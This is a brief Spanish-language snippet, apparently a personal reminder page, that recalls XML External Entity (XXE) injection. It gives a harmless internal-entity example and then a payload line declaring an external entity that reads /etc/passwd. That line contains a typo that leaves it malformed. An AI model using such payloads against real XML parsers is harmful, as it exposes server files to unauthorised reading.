nadie se acuerda del XXE
<!DOCTYPE replace [<!ENTITY name "john">]> <userInfo> <firstName> Falcon </firstName> <lastName> &name; </lastName> </userInfo>
<!DOCTYPE root [>!ENTITY read SYSTEM 'file:/etc/passwd'>]> <root> &read; </root>
Última actualización hace 2 años
